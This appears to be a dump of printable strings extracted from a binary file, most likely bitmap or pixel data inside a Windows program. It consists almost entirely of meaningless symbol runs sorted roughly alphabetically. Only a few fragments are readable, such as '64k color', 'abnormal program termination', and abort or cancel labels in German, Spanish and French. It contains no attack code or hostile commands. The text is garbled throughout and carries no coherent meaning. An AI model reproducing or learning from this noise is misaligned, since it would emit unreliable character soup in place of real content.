.(-3,1F>EWLVhUXv\\
 3.2E:>Q)0A
3$30l3Xk
 *$%,$$.&&3*'3*',%"(  ,&'+&''#(*)3/1<>?MADR8@M9>MZ]k
33-32.%#"*('+)(0.-310:650,+$ 
33-32.%#"()'+)(0.-3109540,+#
333333
&'%'*(&((&((%''&(()++333:883421/.3./GBDPKMJDIIDF835)''-++(&&)$%$
&'%'*(&)'&((&((&(()++3338883421/.3./GBDOJLJDIIDF746)&(.,,(&&)$%$ 
/3 -3 .7#/:&/;'-<'/;'0:)-;)-;)/;).:(.:(-;).<*-;)2<+1;*/;)-;)-;).=(0<(.;%2;&09%-7&*4#)1 $$
)&!33-`gb
/!!3 "4
-3".4#06%/9(/;)-;)/;)0:)-;)-;)/;)/;)/;)-;).<*-;)1;*0:)/;)-;).<*.=(.=(.;%1:%09%-7&+5$)1 $$
340hrl
*%&*%&&!"& !'!"'!"-('3.-4/,1,)*# 
*%&*%&&!"& !&!"&!",('3.-4/,1,)(# 
&"!)*()++...34201/,*)+)(+'&($#/,(>;7;763/./*+UPQJFE:6540/MHINJI3/.+'&#
&"!)*()++...34201/,*)+)()'&&$#-,(?<8;763/./+*VRQKGF:6540/NIJNJI2.-,('$
343=3B3j3p3|3
3;43;4
)/#/3&44'52(52'79.B:2P92U6-X5+Y*
3"%4 %D37YCHgRZj_iqfpyms
35%<1$:.!7- 6+
>35>35<!
)))355053.4/:?=031,/-)*(,-+-1,2619=8;<:?=<865843954732800=87("#&
,+!..!/.#35)=5(>2%?7)E:-S8.Y5*\4*Y+
35"=8#C5$E7+O5.S:4]17`0>bPe{g
3''5#$G/1X;>aCBuVU
3''5#$H02Y<?bDCuVS
%35@RT_NQ`@L^T[nYargn
36&=2&:.!7,
%&$364ktq
%&$364lur
3$(6'+A39PAIWLTiUax^d
3<!7>#2=#1@$5D):H6;=1\PL
3<!7>#2=#1@$5D);I7<>2\PL
*37}Cg
)) -& 3$!7(%?'#@+%D/'L.)P)+T-.Z14a67c7;d=<f43Z0-T-*Q(.W%3]$4_,7c86d44\13[/1Y::bHHpUX~ej
3,7SCNnUb
3]"8h,Bv,D~.G
3:(9;,:;+66!)/
%39BOQS__
 %39COQS__
3]"9g,Bv,D~.G
3A|3A{2@z7E
3?a8Fj5Hk'9^
3?a8Fj5Hk&9^
;3#B2'G9.ODBfqs
3(/BFM`mt
,>&3C$2D!1B
-=&3C'3E!1B
\3*c3'xA2
 3#$=$"C$#c>6
3c)D}3K
3c&=o)Cy.I
3co;p}*dp(dp"\h(\l*]m+Zh*Zf(We/[l6bs9evFq
3CUitWgnL\iQ]oO_pR`sO^qO^qTcvUevRbsRbsQaqPcpSbk
3+D5,[E?|e]
;3D;H;L
[3!eH9eREJ?7"
3\/Ei4Kk(?_#<^)@f,Ci0Ek.Ci,Bf1Di2Fi0Cd1Cb4Da5Fa?NhIWnQ_uVdwZhz[i{[j}]k~_n
3G 5M/=qZe
3Gf!4U3Ie[p
3Gf 5U2Hd[p
3g!>q&Az(D
/!#;.3HAEXY\qmp
<3!HE;_63Z.+R5/R;6VA;^@8`71Z2/V65]97e96g99iCCsMM}TT
]3'i<1g=0U/#jJE
3i!;q"@w"?|&B
3i!;q"@w"@{&B
3j&6k&%L
<3!JE;_83Z.+R4.Q:5UA;^A9a71Z2/V65]86d96g::jCCsMM{TT
$3).=JN`vz
3;-JQ(AC3GH
3;-KP&BC3GH
[3.l>7
3#&LCInQZ|PZ|]f
3M-EcF\xdv
3Mk%:Z%9X.C^8MlF[zKa}bv
'\+3n4B}=Q
3]qF]KDq^V
#! )%$/+*.&&3))RJJeYY`PQTECD53A209-)."
>,}3!s+
3.//*+-+*)'&*((,')*')%(,svz
3.//*+-+*)'&*((,')*')((.sx{
.?3SYy
@3T3e3
3@tFN}
3;v$-f
3;v'.g
+3Vksj{
3%+X'4l-=r6Au9Kz
3Y2Np>Z|B_~3Ni&:Y'9X.C^8MlF[zKa}bw
3>Z6D`(6R(5O(3O$/K0:X/=Y,=X/=Y,7S5=Z6A]1?[4=^0;[0=]8Fc8Fc=Jj:Ij<JnDQwANt@MsERxLW}Za
3>Z6D`(6R)6P(3N$/J0:X/=Y,=X/=Y,7S3=[6A]2@\4>\0;[0=]8Fc8Fc=Jj:Ij<JnDQwANt>MtERxLW}Za
3<z,=y+E
=('@+)<%#4
)% <4-
&4	+.	'&
%"-$ 4"
+% <4-
'#"-)(40/1-,,('621843621:54=87JBBRHHE99<000$$/#!7++3''/#!*!
'#"-)(40/1-,,('621843621:54=87JBBRHHE99<000$$.""7++3''/#!+"
&4#03$2.
&4#04#1.
&%)405?9>B=?HCD954<:9;98
&%)405?9>B=?HCE:56<:9:87
+)),-+'(&#! %##'"#'#"*&%.,+40/723:56FABGBCB=>B<=A:=;68+%&("#-'(,'(*%&(#$,%(+%&*$%,'&.)(.)(/*'(!
 ,**,-+)'&#! %##'"#'#"+'&/+*40/723:56FABGBCC=>C=>A:=:57+%&("#-'(+&'*%&(#$-&)*%&(#$+'&-)(.)(/*)&!
 4&0BDN`lu
4#/0	#G
-4-.12mmm
{41}62
#&"'4/1946
4-$>1(C1'E.$B+ @.#I:1\3-^4+]1&T-
4#1G;QPHfPJmKCkJCnQJwWQ
 4#1H;QRHfQKnKCkJCnQJwWQ
4*1L9@Y`j
"#!$"!+,*4211-,.*)6217//1,+#
#$ "&!#'"%&$#$"%&$''''*(*+)4226756441,-2-.@;=F@A<78/*+#
+'&422;67A<=421+))*((*(('%%'%$A<=`\[ytsummWLNI>@UJLC8:>35?:9/*)#
422===7:8031;<:"#!" 
&&&422*+))'&)$%+&(.)+-(*8354/1$
422===9:81429<:"#! !
4+!26*2H5.fI&
4/$>2&B2&D0$B- @/"H:1\2,]4+]1&T.
/).4-2E=DXMWhTYv[^
&! 4/.3++'
&! 4/.3++%
$("'4.3946
4&414]4
4%4+4G4
)&!44.`gb
45"=7"B6&E:,P5.S;5^17`/=aPd}g
4%)5&*B4:PAIWLTjVbx^d
)))466053.4/:?=142-0.)*(,-+-1,261;<:<=;?=<865732954732800=87("#&
%46ART_NQ`@L^T[oX`qho
/(%/)$4)%6("K<3
 $"#''$&(#%'"$+&(/(+4,-?776..
 $ #''$&(#%("'+&(/(+4,-?777//
4,7SBMmUa
483t{x
,  4&'8,,7++4((,!
/'(4,-.#%8,,C777+)7+);/-;11(
4)!9-!?,
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4A'AJ565'+
 4(/BFM`nu
4b&=o,Dz.I
4"!<'%C&
4C@_nBp{:jv5ft0bn*^e(`e#]b
^4(d@6a6'^5&a>0[E:TH>SK>UPA]YN`YJdVCdV:iU<i^Hc]FeU>aS=[K:\E6ZB6Y=6jEA
4dp;p}*dp'co"\h(\l*]m,[i*Zf*We/[l7ct:evFq
4Ds%3d%3g$5h%1k"-i
4DWitXhoL\iR]qO_pR`sO^qN]pUdwUdwRbsSctOarQdqTcl
4# =(&E%
4:e'0\'3c+9j2<l1=m1<n/:l1:l29k3:l/6g04g.5g7>p;Bt5>p@K}FQ
4:e(1])5e+9j2<l0<l0<l/;k1;k29j29j/6g05f.5f7>o:Dt6@pCL~GS
4:(E:+K<-M;,L=0V<4]A;d6=d/BeCZtQn|RosYtpawrdwtcutbqsbmujn
4E~.;o^g
[?4fI@}ZM
4gw'[k3gw=q
4h!>q&Az(D
:4i1.fQL
:4i1.fRM
[4{L-F, LCFi]ixjv
4&'MEHnS\}S\}_h
4"(M%,W")Z
4'(NDJoS]{R[|_h
4N-EcF\xdv
4PM8M?3N<5K;4^NGm`Xwg`
4Q5e5x
4!$sF1
4Tg-K^0Qa2Pa6Tg5Ve6Wf;Zi9Ve3M]1KY/MX4`mIz
4Tg-K^0Qa2Pa6Tg5Vf7Xg;Zi9Ve3M]1JZ/MX4`mIz
[4&uXJi[O92)
:?4V\>`fKmzOp
:?4V\>_hKmzOp
4\wEWD<hRG
4X&>b'=a1Gk1Gk.Dh.Dh5Il2Ef0Dc/A^,?Z0A\4C]9G^@NaLZlTaq[i{dp
4X&>b(>b/Fl1Fl,Dh.Dh2Hk1Ff1Ed/A^,>[/@[4D[9G]@NaLZlT`r[i{dp
\4yJ.B*
\4yK,B*
->#/5$$
,<$.5 &
.?$/5$#
5,)0-)!
-()501502-()"
-()501502+(*!
(&%+*&/-,501:56C>?:56<78=89945/*+,'(2-.*&%&"!*%"&!
(&%+*&/-,501:56C>?:56<78=89945/*+,'(2-.*&%&"!*%"&"
 '"$,')5021,- 
 '"$+&(5021,- 
(#$/*,502302C>@A<>:79:57613C=>OJIA995--/'',$$(  %
)%$,('*&%-)(50/7//;33J>>D67;-.;.,?3/9-)1%#,!
5'0K9DZ^k
51~40~40
51~51~51
51~51~51~51
@51B53^LK
5*1L8BZ_i
|52~74
!!!&&&***,,,532:65<95MIHSNMKFEKFE=98>:9=78510,('+'&)%$$ 
5330.-%##&#%(%',)++',215206\]aklp,-1
!!!&&&+++,,,533:65<95MIHRNMKFEJFE=98>:9<78510-)(+&')%$$ 
53 5|p
5 "4"#2"#.
5/~4.~4.
54678<KNRgklx|}
-$!=55,$%#
-##=55,$%#
#5!&5 #1
,5!-5!-2!,-
?55>66TFGi\Z{nf
?55@66VFGi]Y{nf
5!6&6/6
)56Ab5t5
/56PW[v
,5%73#:,
@574)+.&'8-/943)$#+%&+%&+%&)$#'"!% 
/''5--.$$7++D868,*8,*<0.;11(
!!"$$,..586786111/-,.,+675D@?D@?B=>>9:IDE2.-%! ,('B<=>9:#
58{*9{*G
% !'$&((.58@WZbilp^cbwz~
5axLVJ@jZN
5C~8H}3@tFN}
5C~*8lXe
;!;+;5;?;C;J;
5Cs'2d%3g&4i%1k!,h
5Cx-9o&0f
5DGmbg
5FGmdf
/?5FG=N4*;7,@@5I;5H/)@1*E6/P4-P3,O1'K0%K-!K:3`@9l/'\/&Y8)\,
.=5FH>O3):7->=4H;5H/)@1*E5.O4-P3,O1'K0%K+!K:2a@9l0(]/&Y8)\,
:5:F:Y:w:|:
5@HQZd<FM
5@HSYd<FM
*[$5h-?t2Bw7Cy:F|>H~:CuOX
5i 2g"2g"0a
5!(I=FgQXyVXzY`
5iv(\i+_l2ao6cq<et9`o9\j?`oGgtIft/LZ0MVDajGgrGltFox@jv@mxKy
5iv)]i+_l2ao7dr=fu9`o9\j?anGgtIft/LZ0MVEbkGgrGltFox@jv@mxKy
5iv(\i+_l2ao7dr=fu;_o9\j?`oHhuIft/LZ0MVEbkGgrGltFox@jv@mxKy
5K+AZ9QiE]uD[q>Uk?Vl:Pi3Ib-C\&:S'9P[l
5K*BZ8PhE]uD[q>Uk?Vl9Oh3Ib/B]&:S'9P\m
&5??>KISa]
5"(M%,W#*[
5o!5n!5n 4m
5o!5n!5n 4n
$5`%;o&C|0P
$5`%;o&C|/O
#;,5PHQl^e
5]qF\IBoZR
;*5QH\d]x_VwULmUJpUJr[LrdSx`NuTGmSLoKFfNIfVO^
'?-5R4?_CLrZc
%>-5R5>_CLrZc
5"%sE3
%@!5T5KgE[wJ`|I[xEUrZi
 5	*V#Gq>c{Hl
5Wh`IA
=5x0'r'
5%+X'4l-=r6Au9Kz
]5xI-C* QFHr`g
5"y@ \_
5y'>|2E
(%!:<6}
)&":<6}
*""6.."
6-*0-) 
 *#&601*$%"
*#&601*$%"
60)5H93cK)
 -!'6)12%-.!)-"*2(48-=5-D@6T@8];1[, D+
!$"$%##$"#$"%(&(+)()')*(+++,***&%)%$612712-'(*$%"
"%#$%#$%#$%#&(('*(()'+)(,,,,***&%)%$612823-'(*$% 
(#,61:30?+.J&3a
6$1e$3q!'\
 '"#)$%%! ,'&621('#
&"!)%$%! ,'&63/('#
6%"4%"7'!2$
&! @;:6...""4((8,,8,,:..8,*) 
&! @;:6...""4((8,,8,,:..8,**!
 64k color
*6'57'89(6A-9>*6>,3:%'2
65789=LOSgklx|}
6.6:6C6M6W6\6
6<6]6i6
-%%>66PDDF67<,-6'%9*'=1-6*(, 
-%%>66QEEF67<,-6'%9*'=1-7+), 
6!71767D7R7^7i7p7
673szw
6/,@74,  ,  3''8,,6**5'(+ 
!!$$$...675786311/-,.,+865D@?C?>A<=>9:IDE2-.%! +&'B<=>9:#
>67>678!
*%"<67A99<228/,0'$-$!,#
*%">67B::<227.+/&#-$!,#
&!"'$&((.68@WZbhko]bavz{
69:O;5F-(1
69:O96E.)2
[6.a3(wC3
6;>?AB
$6AI\hn]imalpirus{{w
$6AI\hn]iobmqiruq{{y
6AO)8H>N[ScoYkvRdoOboJbnSmyRerI^mRgvTix_r
6Az8As?GvAKzGS}GUyDSs<Jg7Eb.<Y*6R+8R-;R7B]ENiNWrY`{bf
6Az9Bt?GvAKzGS}FTxDSs>Ig7Eb/=Z(6R+8R-;R6A\BMhNWrY_|ae
6%)B48T@D`OSpbe
6B^'5R.<YHTpLWu6A_.;[4Aa3@`6Aa8Ab6?`<Ef<Gg?Jj@Kk=GiAJoFOtBJo@Gn<CjJPy^b
6BD4>>n{y
6BD5??n{y
6_}BVA9iPF
6*C2)L:/]G<v\L
6>cQV}
6^{CU@8fNB
6%(D48T@DaOSpbe
6!%=(,D',A
6%(D%(D48T@DaOSpbe
6doO[LIXJK\MJgPUkVXy^a
6Dy-9o-9o#/e
6Dy-9o#/e
6(e@,T9+R;,XC4aH>cK?nTFw\N
\?6f5+}?/
^?6f6*z?0
;/\6*gA/|N=
<6gIBmEAeB>bFCjSPpXVtXXpOXl8Jg
]6'g>/}YI
6?H(07149?8?B;@<;?95:76:75;61:63<55;77=47<6:?7:>29B5?I\htt
6?H(0725:>:@B;@<;?95:76:76:62863<54=76?46>6:?7:>29B5@H\htt
6!(I;DeNWyTX{\a
=6iJCnE@gB>bGDkSPpXVtWWoOXl8Jg":h%9r-6\'&*(&
:6=jhm
6)K4,F91Q<4R?7_G;mUC{ZF
6]KDpaX
6_kMSI?SJ@YMG\SIdRKi[Or_W
(\&6k-@s-Bv)@x!9s"8r
,`(6k.?x+G
&6*>PDbOHkKCkHAlKEtPJyQM~YV
@-6PFW`Xo]SqTHlPCiQDjUGiTGgTDfSDdSBcWKiZMgcQh
6^pGUH@TMD[OI]QG\NHo_X
@-6QGX_Yp\TrTHlPCiQDjSGkTFhSCeRBdSBcWKgZMgcRg
;)6QH]e^y_VwUKoUJpUJr[LrdRy`NwTFoSKpKFfLHeVO^
#<-6QHQl^e
6#)RAJpPY~N]~FWxO^
6#)RAJpPY~O^
6To>]vOm
%@"6U5KgE[wLa}I[xCUrZi
=\}6Ut5Sn/Mf4Tk<Zs:Xq9Wp<Wq=Vp=Uq9Us>YtA[yDYx@ZxE_}Ie
#=6=|u|UMW&
6.V5,S9+W9(X;-eK=jXGsXJ
'6:V]b
6/W;0WB3X>0T?0YD5^D6aF8fG8hF6iG7gF6jE7lF:oL?sMArM?jM>kMBnRGqYMs[OrWMuXQvYRsXNkQJeSHmYNp[SlZSnaYo_YkaZf]Yk`\j^Zj^Zg^Zc]X_\T`]Ud\Uh^Wl^XeWQgXUm^[o]\s_^scdvjhrgcn^XiVOpZTkWRfSNhURn[Vr^YlVQmUOoYSmZSkYRmWQiRJjPInSInRKrUPv\Vs[UnXMrWMw[TqWPnUKnVJlRDqQDqQFpSEkQCqYM~cY
6WA6gMA
6ws f\
6\~>XA9iND
+6Xksj|
6*x ~M
6YB:kPF
(;".7#)"
 707wovE>E 
 707wpuE>E 
$7$-:(/@,1A*2@+.7#"4
!-!'7*22%-."(-"*2(48-=8.EA7U@8]:2[, D+
7230.-%##)$%+&(,(-+',326317\]aklp,-1
*&%7322/+-(%'"
*&%7322/+-(%(# "
%! ,('732:522-*,&!"
%! ,('7329412-*,&!"
!%+-'7;</34134244222/12134INM
#7)3EFPbmv
%-!-7->:3ND>aGAjHDnGDqNLzJIuGDqFCpIFsNKxLKwEDkGF`CAG=D74>'1@!5A#6C#4D"1A",B&<L4:;+/!
%, ,7->:3ND>aGAjHDnGDqNLzKJtGDqFCpHGsOLzLJxDCjGEbC@I>B64>'1@!5A#6C#4C#1A",B&;K3:;+/!
[. `7.`4-[0'X60P73T;7Q93K81L91U?3^B1
[. `7.`4-[0'X60Q84T;7Q93K81L91U?3aC2_@+`B1`@3^;-^G7TC6QD<NA9O?9Q>9T>9\?:[6._80]72Y2)[4+V60W=7S<4Q93W;4W?3X?5Y?.`@-`B1]@1X5'Q4%O5)T:4V:3X;4V<5S3-Z6,\9,_</_?2^3$_9-W:5U@CT>JM;HJ9FN=KVCL\@FZ=F^GU^CW`Ga]QmRVrRWxRZxPWxWZyZ\{`[vcQhgOgq]pzTfxScvR^rSViDF`9Aa=KeM_f?NhES\HU[JX^LY[JU[JXfU^q_`
[. `7.`4-[0'Z/,P51S=8LF;C[I;~c3
|74~96
,7 .5!-2!,.
%&$;<:755'%%$""A=<>:91,+801;56*$%$
%&$;<:755'%%&!"A<=>9:1+,801;56*$%$
7.+?63+
76 <3#B2'G8-NDBfpr
)&";7641-,)%'$ 
7.{645FF040
;76;65)$#*%$*$%0*+3-.2.-+'&,'(*&%#
;76;65)#$,$%*$%0*+6./2.-+'&,'(*&%#
,%"76:9<K9<J;:D88D78F45C4:G4;J<>I62=2'/:&+<%)="%9!!9
7*,7+09 &3
?7~?7~?7~?7
7*,7*/8!'4
,7'7C&5>R^h
,7)7C&5>R^h
7)a7*U<,Q>)VB0[I8eXH\VKVTIge[|j_
&7AAAOKTc_
 '7AA@NJTc_
@7A(!(`Z_zw
]@7b>4vK<
7B~+8lZe
!/"$7%&B)%J*%hA8
7BV2>P"-A
7B],=W4B^FNkKNjUXtfl
7B]->X3D_GOlJMiTWsfl
7C_%5R-;XHSqLWu6Aa.;[5Bb3@`6Aa8Ab5>_<Ef<Gg?Ik@Jl=GiAJoENsBJo@Gn=DkJPy\b
!/##7%&C*&J*%hA8
7Cm!(S
-;#7E-'(
]@7e?3vI;
^7eK=YA5Y?1dI;yZK
^7eK=ZB6Y?1dI;yZK
7EW0>P+;L 4EHXi
7EW/=O+;L 4EGWh
7FC663
7F~.;o^g
*]#7g(8g
7!)G<EfQXyTX{Y`
7Gu6DnFLuX]~p{
#+7;=IIKVT
$+7;=IILWU
7@ip:K
[7'j=2|L@
,_$7j)8i
)[)7k)8i,;l+9j /]!-]
7$LM6f
,`-7m-8j.9k-9i"/]
^7(m9(
$"(7>MEI[TVhPRdJQbDMaHTl`m
?7N7T7]
,]&7o*<w,@z(>x(<u*;s%6n"3f>M{
]@7oXH
7pq2|x
7Qb*BN2LR
7Qb*BN4LR
7qv+de!pq1
7#)RBKqPY~N]~FYzN_
7Rf,I^/J_3Nc6Qf4Re9Th:Ui8Te4N^0J[.M\0[lI|
7Rf-J_0K`3Nc6Qe4Re9Th<Ui8Te4N^0J[-L[1\mJ}
*7	"S<I
7U@8fMC
7Up>]vOm
7.-[UUvqq~yy~yyd^]C;:
=\}7Vu5Sn/Mf4Tk<Zs<Wq9Wp<Wq=Uq=Uq9Us?ZuA[yCXw@ZxD^|Ie
_7+vYP`NG0'#
'7;W]b
^7YA5Y?1dI;yZK
]7zK0F+!UHJsbf
:#!>&&?%%:%#8$
"8 $:!#<"
(; /8$(!
8-00AA
(#,80:30?+-K&3a
803HEIa]_wxx
]80c5*wC3
818QMY_[glgvidskhwdcs`dvrx
818QMY_[gmhwidskhwdcs`dvqw
+8"1C,1J.3L06R55T71U71W9/X9.W;.W;.W8/X91Z;2[<0Y:-W8+U6-S7+Q5+Q5)Q5*P4,P2-O1+J--J)+G).E)-@'2?))2%
+8"2D-1J.4M16Q76S92U:/W;/X90Y:/X<-W8/X92[<3[?/Y:-W8+U6/R7,R6+Q5+Q5)O3+N3-O1,L-.K*+H'.E).A(2?)*3& 
(#$834=890..'%%*')2/1200422:56B=>UOP^VWbWYeZ\dY[YNPG<>MEE/*)& !)#$0((0((+##(  $
*%&/*+/)**%&% !834945/*+4/05/0E@AZUTUMMIAAE@?>98<764./;76-)(#
*8 4B*.0
[84V:9V;>V;>K//Q40Q3.L)%F"
@.&'85
:/ <,#=.%?.&=-'8-&53+<61F=<P;>Z9:\97a<:h??oHHxJI{EBt56b/.Z/.Z43_86dCAo]^
&$#%(&...8::=??555444311.,,*('311:5684340/.)*-()1*-,&+.(-5/40,2JIMQRV#$(
8#&>+.>,->)+6!#1
@%!@$#? !="%<&+8'+6$1>,=C/B?-D<1Q<1W97[;=f;Al=Do:Bq8CoAHsHGqKSqW\{`[zMNj:?^68Z:@]CE]A=VA;RG?^B9Z<6U94SA;ZJEeWRqec
8733330/11.01.0./3-,0(-..15
8733330/11.01.0./3-,0',/-25
@8~?7~?7
8! 7! 7!
@8~?7~>9
 /*++(*879EDF?>@B?A302502IDFRMNUQPVTS
 -+++))879EDF?>@B?A413502IDFQLMTPOUSR
<87MNLJKI9:89:8222::::9;
<87MNLMKJ9:89:8222::::9;
88(?<0B6'5/
"8 $:!#<" :" ;!";!$8!%7 (8!'7 $6
:  ;!!: $8!&8!(8!'7 &6
8:;89=@CG^^dsw|
<(|8!|8!u8$o4!u:&|A-};(x4
<(|8!|8!u8$p5"u:&{@,};(x4
89)@?1C7(6/
89=89=@CG__esw|
&89[lm
=89VQR]XY`[\YSTA<=0+,.()("#!
=89VQR]XY_Z[YST@;</*+.()("#!
8[}9[y7Ur3Qn7Ur8Xu5Ur2Ro-Mj.Ml3Rq<a}=a
8*~9(z7({8)
8#&A,/@+->)+7!#3
:8A:8A:8B;8D0-<
[?8aLDt]N
8AO)8H>N[ScoYkvSepOboIamSmyQfuG^mPgvShw_r
8A\-:T1<XDHeLMicf
8A\.;U1<XBHeLMibe
8%)B+2F09M2;O;@U?CVLL^MOaOSfTUi\]q\[odbxki
>!>*>8>B>H>V>`>
8cN,P?
8>cPU|
+=!8;'D6%F3)M.0Y13c49f7;k<=i::b>=gBCoIMvLPyEKnAAe79\72R98XC>^?C`@@X;<V9=V4:W7;X?A_KLh]Yrie~ea~TQjBC]6:V;7T;<QF@SOEVRAOF2?C09L<GLFWJK`JJbSPfUM^SGS]MX[IVdT[n`bznn
8D;coBp{8jv3gt/co)_f)`e%]b
8D<cqCp{8jv3gt/co)_f(`e#]b
8D%JX5Ub>\g2S\
8D&KY5Ub>\g2S\
,8DSdwCXm?To@UpL_t_r
,8DUdwEXm?To?ToL_t_r
-;#8E-'(
%8E>Q`
8es3`n1]n/[l0[l6ar6ap9dsBn{Ht
8es3`n1]n/[l0[l6ar6ap:etCo|Ht
8Ey6@o5Es:HrBNpLWwR_yTb~\j
8Ey6@o5Es=IsBNpLWwP_yTb~[i
8/F0%O9.`H<bH8eD4iK8sQ:
+@ 8G+;:&.
%8G>Q`
8Gu0>o*7o0>s=L}N^
,_$8h)9h
_8)iO?fUHA8/ 
\8(j:(
=8k:4iKHzc\
8ku2dp%Tb$Xd1`n
8.L0)P;3v]S
(\#8l7K
8L"PJ'
8ly>o}Fw
8ly>o}Hw
8ly?p~Fw
._&8m(<s)=v(=t&;r
8mzF21mQJ
\8.n?1
$8?NDHZTUiPQeLReFOcFSiYi
$"(8?NEI[TVhPQeJPcDMaHTlan
8o~:o|5jw0dt1br4_p:cr9du2]p+Zo5gy8l}:n~>r
8o~:o|5jw1eu1br3_p7bs9du2]r,[p4fx7k|9m}>r
8% P)!
&8)>PDbQGkKCkHAlKEtOIxQM~ZW
8p*E}-G
[8.^</pI:
*]!8p'<y(={1G
*]!8p'<y(=z1G
^8,r>1
/8Rdug~
<+8RI^\UpXRqTOoWNvZLvXHq_Ox^PzYLxa\
<+8SJ_\UpZRqVOpVNsZLvXHq_Ox^PzZNxbZ
}8.T4/S8.Y93\?6`C<fKAmSC{YI
$<8>|u|UNU&
8VA9hOE
8#!wH2
@8y6+t,$p$
8#!yH2
%8{$/y!-u
8^}@ZC;lQG
|~9,*;
#)($-;%*9
9*:/$:
9$"=('0
`90nA3
9$"=('1
91 B;0Q2.R+'K/(I50M<8UE@`D>a=9\;7`<7d;7h<9jB@nFFvMM{GHt==kOM{SP
+##?:94,,.$$)
% !)$%945;561+,-'($
% !)$%945<672,--'($
(#$945>892.-'%%)&(2/1200510;56B=>VPQ^VWbWYeZ\dY[YNPG<>MEE/*)& !*$%0((0((+##(  $
945SNPrrx46>
945SNPtrx46>
954E}K
95i62c0,]-,^85cFCpSTzSWtSWo9Jd%<j);x/8^$!#'$
\95X:9V<<V;>K//Q40Q3.L*$E!
@\96DBA2^
96h62c1-^-,^85bFCpSTzSWtSWo8Ic%<j):y/8^%"$'$
9770223111203427547549546212.-?<8A=<C?>B>=QML[WV^ZY_[Za[\LGH954;650*+(#$$
9770223113105327548439546212.-?<8A=<C?>B=>PKL[WV]XY^YZa[\LGH843;650*+(#$$
9" 7! 7!!6 !5" 3 
.*)977FABC?>B@?DBBIGGIGGHFFHFE[WVwsr
.*)977FABE@?D@?DBBIGGIGGHFFJFE]XWwsr
)$#>984,,.$$)
9/ <.#=.%?-%</'8.'63+<61F=<P;>Z9:\97a=;i??oHHxIHzEBt67c/.Z0/[43_97eCAo^]
%! ><<98:64312078620/-+*,('-)(($#*'#.*)3./#
%! ?==98:75431097620/-+*,(',('($#*&%.*)2-.#
*((-,./-,;<:>?=;988662-.,('+'&/-,><;DBB723-()>9:823$
98B98D:8E:8G
|~9,*9,*;
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
?&$='"9#%9&/B3AC2G=0J90K8/J=5TC>^B=]<5Z?;d?Cl=Cp<Gm?HnGOt[Xx`[zhb
$)#(+(*;99CAA
("'("'& %)$&,**;99DBB
9\~9[y7Ur3Ql7Up8Xu5Vp4Rm.Nk.Nk2Qp<a}=b~<a}Di
9>AGIJ
9ao^@q
]9/b?1
9%)B+1H/8L4;O:?TABVKK[LN`OSfSWj\]q\[odbxij
9!%D)'F)&E$'F+&F-'J0%J0$I/$J.&I.(I.%H-(I.'H-&G,%F+$D+#D)"C($C(#@&"?%%?'#=%$<$%;#$9 #9!
9Dv0=q-;l2@q:FvBO}N[
9Dv/<p-;l2@p:GuBO}N[
&!"@;=@:?@9>E?D938.+-)&(#
9EG6BBlzx
9ft3`n2^o/[l/[l6ar6ar:etCo|Ht
9-#G5*lTH
9g$8q-6\'&*(&
9G|9G{:Iz0Ar6Hw=M{LZ
9G|9G{:Iz0Ar7Ix=M{LZ
9GdFVs?Ol/<\?Mj^j
9Gq2>n2?s2Ay3Bz4@z0B
9Gq2>n2>t2Ay5Bz6A{0B
9gx7ev>m{Co
9gx8fw>m{Co
9Hv.=n+8p1?t>L}N^
+[+9i.>m1?p/=m 0[
&9:\jm
9kw0gp$Wa#Zg0ao
>9l:4iKHzc\
9l%B{)F
9l%Cz)F
9)"[LIthd
9)#[LIthd
-`(9l<J~M[
9LQxqu
9LRwqv
9m~3gx6gw6gwAr
9m~3gx6gw6gwBs
9MRRhm
.@$9N0G]6Le0E`':U
$9@ODHZTVhNRdLReEOaERhZj
9,*>*)R>=cQRpRQwYX
9+:rSd
@+~<){9'r:'z?/
@9/S2.R*&J/(I50M<7VE@`D>a=:Z;8_;7a:6g<9kB?pFFvMM{GHt=>jPM{RO
9,*>*)S@=cQPqSRwYX
&9;S@D\Z_x_f
9Uf'AM.HN{
9.:U:p:}:
9v 8t 7o
9_w6Wk'DS
9-W<.S;/aB9jKB
_9xK0G,"_NQw`h
_9xK0H-#_OPwaf
(9|"/y!-u
9.Z0)lJDpPE
_9zJ2G,"XJLudg
_9zJ2G+$YKMudh
_9zK0J/%bORybg
.*	\{a
$*$/&$A%.`
A;~@:~@:
A#~> |<
$*A 0^%-\
A0[:1eA;}OH
A09A=P=>S?CU<APBBPI?KD8DC:DF05=$(>& ='
A12C.0NDDYSTg_`mbe{ps
A16W@EfFLoOUxU^
A1_80m?7
[A3j@3~QC
 A49ZBGhMQtQWzW`
%A4DPGaUOnQKnQIrWOx_U
%A4DPGaUOnQKnQIrWOx_V
-a&4h4Dy9Hy8Gx8Fv:Iw/?j+;f-=h
A4J4Y4_4
a4&j;&s?(yA({>$
A:}=5{7/v0'r*"q%
[A5e?3~QD
-a'5j4Dy9Hy8Gx9Gw:Iw/?j,<g-=h
\/!a6-`4-[0'W5/P73T;7Q93K81L91U?3^B1
A67-586
#A6A\{
]A6dA3pNA
_A6pF9xK>
_A6pF:zI;
A772*+.&'8-/832)$#*$%+%&+%&(#"&! $
-a-7m-8j.9k,8h"/] +]"/c$3d(8f 4]1Fl6Lo#9\
%-,<,+?.-A+)=&$8
a8)kN?fUHA8/ 
a8/m?7
a8)uXIxeXLA9"
&!"?:<A;@?9>E?D738-*,)&("  $ 
???`aa
A# @!!>%"?&#@'#@'$A'$A'#@&#@'!?&!@% =$
A#!A""?&"?&#@'#@'#@&#@&#@&"?%"A&!@% =#
a[~a^~c^~d[|bZy_Wu\Tr]Ok]Sq]Sw[W
`aarrr
ab[993
A~bA~dB|d<u`4lY1gV*_Q!XI'[J1[J)G:
ab}a`~`_~\\~_\|_Z
A;~@:~@:~@:~B<~B<~@:
Abbrechen
>{aB|d;s^7oZ1eS.\O8cV2]P$=3
abnormal program termination
Abortar
Aborter
abv\`sJOdCI`BH_-2KFJbvx
ab~XXv[]|_`
'a!-c%/_*4c0;g>EpLV~ep
a^~c^~d[|c[z_Wu]Us]Ok]Sq]Sw[W
acu?CN+:=-9;.7:+8:,9;+8:*79*79)68)68,:9*87/<>,9;)68+8:+8:-9;*68-77,88-9;-9;/8;*68)57+79*68+55+55,66)57*66*66.97-77$-0%20.32*36*66/77/77/99/BE?agm
acu?CN+:=-9;.7:+8:,9;+8:*79*79*79*79+98*87/<>,9;)68*79+8:-9;*68-77+8:,9;-9;-9;*68)57+79*68+55+55,58)57*66,75.97,75$-0%20-32*36)57/77/77/8;/BE?bfn
acuW_vTby[j
